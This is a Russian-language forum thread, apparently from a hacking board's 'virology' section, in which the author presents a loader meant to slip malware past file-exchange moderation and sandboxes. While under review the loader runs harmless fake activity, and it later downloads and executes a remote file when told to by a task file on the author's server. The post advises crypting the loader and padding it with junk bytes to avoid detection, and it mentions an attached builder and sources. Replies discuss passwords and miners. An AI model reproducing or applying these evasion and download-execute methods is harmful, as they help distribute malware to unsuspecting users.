Загрузка...

Лоадер для обхода модерации

Тема в разделе Вирусология создана пользователем awtaritet_full 19 авг 2022. 2117 просмотров

Загрузка...
  1. awtaritet_full
    awtaritet_full Автор темы 19 авг 2022 4 27 фев 2021
    Пишем лоадер для обхода модерации

Решил написать статью о лоадере, который я юзал для прохода модерации на одной файловой бирже, где файлы проверялись то ли на виртуалках, то ли в песочницах.

Метод подходит для прохода множества количества модераций. Например, можно скрывать свой файл от ловкого глаза селлера лоадов

В конце статьи полные сорцы и билдер

Как же будем проходить модерацию?

Нам необходимо, чтобы при запуске нашего файла модератор увидел нечто безобидное. И когда мы начнем лить - уже выполняло свои функции.

Тут варианта два:

1. Обнаружение песочниц и виртуалок
    2. Активация по команде.

Первый вариант нам не подходит, так как скорее всего нам не удастся спалить виртуалку или что там.

Если биржа крупная я сомневаюсь, что будут проверять вручную. Скорее это будут онлайновые ав песочницы. И нам надо будет подготовиться.

Поэтому реализовал 2-й вариант.
    Как он работает?

Юзать предельно просто, врубаем builder.exe и вводим урл.

Получаем пропатченный loader.exe

Полученный loader.exe криптуем долгоживущим криптом. Если размер после крипта тоже маленький, то открываем файл в блокноте и дописываем в конце N-е количество байт примерно до 1 мегабайта, чтобы не вызывать подозрений [IMG]

После этого по урлу юзаем следующие команды:

в файл task.txt кладем:

1) Fake - тогда вызывается фейк активность

2) htxp://server.com/file.exe - качается файл по урлу и запускается.

сорцы и билдер

VT

2. Perecrestock
    Pass какой ?

3. MrProfessor
    MrProfessor 6 окт 2022 1 31 авг 2022
    Это конечно клево, но по при модерации сейчас просят кинуть чистый билд, у меня так с майнером было
    Я кинул заряженный билд с криптом, обфускацией, по итогу попросили чистый билд, или тупо не пропустят)